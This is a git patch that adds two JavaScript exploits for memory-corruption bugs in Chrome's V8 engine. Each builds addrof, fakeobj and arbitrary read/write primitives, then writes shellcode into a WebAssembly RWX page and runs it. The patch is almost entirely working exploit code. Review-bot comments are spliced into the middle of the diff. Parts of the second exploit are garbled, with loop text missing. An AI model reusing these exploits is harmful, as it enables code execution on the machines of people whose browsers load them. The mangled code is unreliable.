From b69bbe527fcbaa9623f19408e176f55b37b2efdd Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Thu, 13 Jan 2022 17:58:32 +0800
Subject: [PATCH] add chrome exp
---
 15-chrome/chrome-0day/exploit.html | 1 +
 15-chrome/chrome-0day/exploit.js | 122 +++++++++++++
 15-chrome/chrome-exploit/convert_shellcode.js | 1 +
 15-chrome/chrome-exploit/exploit.html | 1 +
 15-chrome/chrome-exploit/exploit.js | 161 ++++++++++++++++++
 5 files changed, 286 insertions(+)
 create mode 100644 15-chrome/chrome-0day/exploit.html
 create mode 100644 15-chrome/chrome-0day/exploit.js
 create mode 100644 15-chrome/chrome-exploit/convert_shellcode.js
 create mode 100644 15-chrome/chrome-exploit/exploit.html
 create mode 100644 15-chrome/chrome-exploit/exploit.js
diff --git a/15-chrome/chrome-0day/exploit.html b/15-chrome/chrome-0day/exploit.html
new file mode 100644
index 0000000..94aa132
--- /dev/null
+++ b/15-chrome/chrome-0day/exploit.html
@@ -0,0 +1 @@
+
diff --git a/15-chrome/chrome-0day/exploit.js b/15-chrome/chrome-0day/exploit.js
new file mode 100644
index 0000000..e5eb140
--- /dev/null
+++ b/15-chrome/chrome-0day/exploit.js
@@ -0,0 +1,122 @@
+/*
+/*
+BSD 2-Clause License
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+var wasm_mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(wasm_mod);
+var f = wasm_instance.exports.main;
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+let buf2 = new ArrayBuffer(0x150);
+
+function ftoi(val) {
+ f64_buf[0] = val;
+ return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+
+function itof(val) {
+ u64_buf[0] = Number(val & 0xffffffffn);
+ u64_buf[1] = Number(val >> 32n);
+ return f64_buf[0];
+}
+
+const _arr = new Uint32Array([2**31]);
+
+function foo(a) {
+ var x = 1;
+ x = (_arr[0] ^ 0) + 1;
+
+ x = Math.abs(x);
+ x -= 2147483647;
+ x = Math.max(x, 0);
+
+ x -= 1;
+ if(x==-1) x = 0;
+
+ var arr = new Array(x);
+ arr.shift();
+ var cor = [1.1, 1.2, 1.3];
+
+ return [arr, cor];
+}
+
+for(var i=0;i<0x3000;++i)
+ foo(true);
+
+var x = foo(false);
+var arr = x[0];
+var cor = x[1];
+
+const idx = 6;
+arr[idx+10] = 0x4242;
+
+function addrof(k) {
+ arr[idx+1] = k;
+ return ftoi(cor[0]) & 0xffffffffn;
+}
+
+function fakeobj(k) {
+ cor[0] = itof(k);
+ return arr[idx+1];
+}
+
+var float_array_map = ftoi(cor[3]);
+
+var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+var fake = fakeobj(addrof(arr2) + 0x20n);
+
+function arbread(addr) {
+ if (addr % 2n == 0) {
+ addr += 1n;
+ }
+ arr2[1] = itof((2n << 32n) + addr - 8n);
+ return (fake[0]);
+}
+
+function arbwrite(addr, val) {
+ if (addr % 2n == 0) {
+ addr += 1n;
+ }
+ arr2[1] = itof((2n << 32n) + addr - 8n);
+ fake[0] = itof(BigInt(val));
+}
+
+function copy_shellcode(addr, shellcode) {
+ let dataview = new DataView(buf2);
+ let buf_addr = addrof(buf2);
+ let backing_store_addr = buf_addr + 0x14n;
+ arbwrite(backing_store_addr, addr);
+
+ for (let i = 0; i < shellcode.length; i++) {
+ dataview.setUint32(4*i, shellcode[i], true);
+ }
+}
+
+var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
+copy_shellcode(rwx_page_addr, shellcode);
+f();
diff --git a/15-chrome/chrome-exploit/convert_shellcode.js b/15-chrome/chrome-exploit/convert_shellcode.js
new file mode 100644
index 0000000..08dc626
--- /dev/null
+++ b/15-chrome/chrome-exploit/convert_shellcode.js
@@ -0,0 +1 @@
+../CVE-2020-16040/convert_shellcode.js
\ No newline at end of file
diff --git a/15-chrome/chrome-exploit/exploit.html b/15-chrome/chrome-exploit/exploit.html
new file mode 100644
index 0000000..94aa132
--- /dev/null
+++ b/15-chrome/chrome-exploit/exploit.html
@@ -0,0 +1 @@
+
diff --git a/15-chrome/chrome-exploit/exploit.js b/15-chrome/chrome-exploit/exploit.js
new file mode 100644
index 0000000..c14d499
--- /dev/null
+++ b/15-chrome/chrome-exploit/exploit.js
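Review bot: The license block at the top of the hunk opens with two consecutive `/*` lines; the second `+/*` is a stray that should be dropped so the header reads like the one in `15-chrome/chrome-exploit/exploit.js`, which also preserves the blank lines of the BSD-2-Clause text. Beyond the license, the file has no header comment at all; a one-line note naming where this file was taken from (the author is only visible in the copyright line) would make the provenance of the vendored code easier to audit.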
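Review bot: `15-chrome/chrome-exploit/convert_shellcode.js` is committed as a regular file (mode 100644) whose entire content is the relative path `../CVE-2020-16040/convert_shellcode.js` with no trailing newline, which looks like a symlink that was added as plain text; as committed it is neither a runnable script nor a link. Either commit it as a symlink (mode 120000) or copy the referenced file in, and confirm that the `CVE-2020-16040` directory it points at actually exists in this repository.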
@@ -0,0 +1,161 @@
+/*
+BSD 2-Clause License
+
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+
+var arraybuf = new ArrayBuffer(0x13373);
+var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]);
+var mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(mod);
+var shell = wasm_instance.exports.shell;
+var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337];
+
+var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]);
+
+function ftoi(val) {
+ f64_buf[0] = val;
+ return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+function itof(val) {
+ u64_buf[0] = Number(val & 0xffffffffn);
+ u64_buf[1] = Number(val >> 32n);
+ return f64_buf[0];
+}
+
+array = Array(0x40000).fill(1.1);
+args = Array(0x100 - 1).fill(array);
+args.push(Array(0x40000 - 4).fill(2.2));
+giant_array = Array.prototype.concat.apply([], args);
+giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
+
+length_as_double =
+ new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0];
+
+function trigger(array) {
+ var x = array.length;
+ x -= 67108861;
+ x = Math.max(x, 0);
+ x *= 6;
+ x -= 5;
+ x = Math.max(x, 0);
+
+ let corrupting_array = [0.1, 0.1];
+ let corrupted_array = [0.1];
+
+ corrupting_array[x] = length_as_double;
+ return [corrupting_array, corrupted_array];
+}
+
+for (let i = 0; i < 30000; ++i) {
+ trigger(giant_array);
+}
+
+corrupted_array = trigger(giant_array)[1];
+
+var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];
+function searchmem(value)
+{
+ skip = 0;
+ for(i=0; i> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
+ {
+ if(skip++ == 2) // Probably the first two are due to the search itself
+ return j;
+ }
+ }
+ }
+ return -1;
+}
+
+function searchmem_full(value)
+{
+ for(i=0;i> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
+ {
+ return j;
+ }
+ }
+ }
+ }
+ return -1;
+}
+
+var arraybuf_idx = searchmem(0x13373n);
+if(arraybuf_idx == -1)
+{
+ alert('Failed 1');
+ throw new Error("Not found");
+}
+document.write("Found arraybuf at idx: " + arraybuf_idx + "");
+function arb_read(addr, length)
+{
+ var data = [];
+ let u8_arraybuf = new Uint8Array(arraybuf);
+ corrupted_array[arraybuf_idx+1] = itof(addr);
+ for(i=0;i");
+rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
+rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
+if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
+{
+ rwx_addr >>= 32n;
+ rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+}
+document.write("rwx addr: 0x"+rwx_addr.toString(16));
+arb_write(rwx_addr, shellcode);
+shell();